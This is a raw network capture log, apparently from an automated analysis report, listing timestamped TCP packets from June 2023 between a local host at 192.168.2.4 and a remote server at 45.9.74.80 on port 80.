                                                                                                  Jun 21, 2023 20:23:59.965265989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.965293884 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.965321064 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.965529919 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966249943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966279984 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966303110 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966325998 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966368914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966439009 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966456890 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966464996 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966492891 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966516972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966542006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966548920 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966568947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966578007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966597080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966623068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966646910 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966664076 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966682911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966701031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966706038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966718912 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966746092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966773033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966797113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966821909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966844082 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966869116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966877937 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966877937 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966892958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966918945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966943979 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966947079 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966947079 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.966969013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.966994047 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967006922 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967050076 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967073917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967097044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967119932 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967120886 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967120886 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967144012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967159986 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967169046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967194080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967220068 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967245102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967268944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967271090 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967271090 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967293978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967344046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967344046 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967369080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967394114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967417955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967442036 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967444897 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967467070 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967483044 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967483044 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967494965 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967525005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967571020 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967616081 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967654943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967673063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967673063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967684984 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967711926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967736006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967761040 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967776060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967776060 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.967787981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967812061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967834949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.967853069 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.968002081 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.968002081 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988152981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988188028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988214016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988239050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988279104 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988306046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988312960 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988313913 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988331079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988358021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988384962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988374949 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988409996 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988436937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988461971 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988487005 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988492012 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988492012 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988512039 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988540888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988565922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988590956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988616943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.988622904 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988622904 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988622904 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.988833904 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.989504099 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989564896 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989586115 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989605904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989625931 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989654064 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989684105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989710093 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989718914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.989754915 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989784002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989814997 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.989842892 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989864111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.989994049 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.990025043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990052938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990080118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990108013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990261078 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.990678072 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990712881 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990765095 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.990767956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990801096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.990966082 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.990966082 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993027925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993062973 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993205070 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993232012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993232012 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993275881 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993350983 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993365049 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993390083 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993442059 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993469000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993491888 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993494987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993522882 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993560076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993560076 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993568897 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993597984 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993623972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993652105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993678093 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993705034 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993731976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993741035 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993741035 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993741035 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993760109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993788958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993813038 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993817091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993839979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993844986 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993872881 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993906021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993913889 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.993932962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993962049 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.993988991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994014978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994043112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994041920 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994041920 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994069099 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994096041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994119883 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994147062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994174004 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994174004 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994174004 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994184017 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994210958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994225979 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994236946 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994265079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994292974 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994318962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994343042 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994343042 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994345903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994374990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994400024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994426012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994452000 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994478941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994508028 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994535923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994561911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994568110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994568110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994568110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994568110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994590044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994616032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994638920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994662046 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994684935 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994684935 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994688988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994718075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994744062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994772911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994801044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994828939 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.994852066 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994853020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.994853020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.996067047 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.013811111 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.013845921 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.013871908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.013900995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.013927937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.013952971 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.013978958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014003992 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014000893 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014000893 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014030933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014058113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014086008 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014111042 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014136076 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014162064 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014163017 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014163017 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014189959 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014218092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014219046 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014219046 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014358044 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.014961958 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.014991045 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015017033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015053988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015089989 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015141964 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015167952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015192032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015217066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015240908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015296936 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015321970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015351057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015351057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015352011 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015357971 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015386105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015392065 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015412092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015424013 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015439987 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015466928 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015649080 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015649080 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.015892029 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015919924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015945911 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.015971899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.016144991 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.016144991 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.018357038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018389940 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018415928 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018454075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018493891 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.018505096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018536091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018542051 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.018562078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018588066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.018657923 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.018657923 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.021384001 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021539927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021569967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021596909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021625042 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021652937 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021671057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.021671057 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.021682978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021712065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021739960 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021766901 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021795988 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021825075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021823883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.021825075 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.021852970 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021864891 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.021883011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021912098 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021940947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.021967888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.022013903 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:24:00.022062063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.022062063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:24:00.022062063 CEST4970480192.168.2.445.9.74.80
